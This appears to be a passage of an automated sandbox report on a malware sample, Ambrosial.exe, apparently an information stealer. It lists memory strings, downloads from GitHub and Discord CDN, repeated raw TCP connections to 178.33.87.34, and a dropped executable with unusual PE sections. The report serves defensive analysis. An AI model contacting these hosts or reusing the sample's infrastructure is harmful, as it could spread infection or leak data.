              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
              Source: AppLaunch.exe, 00000004.00000002.416317845.000000000729C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmp, AppLaunch.exe, 00000004.00000002.417362319.00000000073DB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15V
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16V
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmp, AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
              Source: AppLaunch.exe, 00000004.00000002.416317845.000000000729C000.00000004.00000001.sdmp, AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
              Source: AppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.311706017.000002023A912000.00000002.00020000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.311706017.000002023A912000.00000002.00020000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
              Source: Ambrosial.exe, 00000003.00000000.311706017.000002023A912000.00000002.00020000.sdmpString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: Ambrosial.exe, 00000003.00000003.553045828.000002023BEFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Ambrosial.exe, 00000003.00000003.553045828.000002023BEFE000.00000004.00000001.sdmp, Ambrosial.exe, 00000003.00000003.552544520.000002023BEFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
              Source: Ambrosial.exe, 00000003.00000003.522806659.000002024E28E000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Microsoft
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
              Source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmpString found in binary or memory: https://picsum.photos/624/191?blur=10GDownloaded
              Source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmpString found in binary or memory: https://raw.githubusercontent.com/disepi/ambrosial/main/cachedclients.json9JSON
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
              Source: global trafficHTTP traffic detected: GET /disepi/ambrosial/main/cachedclients.json HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /disepi/ambrosial/main/cachedclients.json HTTP/1.1Host: raw.githubusercontent.com
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/863628606516625408/866495749909643294/ZephyrBannerIcon-nxstBX5z.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835331120836378624/atani2.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835691740962226216/ataraxiaback.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835895405849739344/auroraback.png HTTP/1.1Host: cdn.discordapp.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownTCP traffic detected without corresponding DNS query: 178.33.87.34
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49748 version: TLS 1.2

              System Summary:

              barindex
              PE file contains section with special charsShow sources
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 516
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_005191532_2_00519153
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_07040A604_2_07040A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_0704EA804_2_0704EA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_09743A004_2_09743A00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_0974BC584_2_0974BC58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_0974EF274_2_0974EF27
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_0974EF284_2_0974EF28
              Source: Ambrosial.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Ambrosial.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\user\Desktop\Ambrosial.exeSection loaded: starttiledata.dllJump to behavior
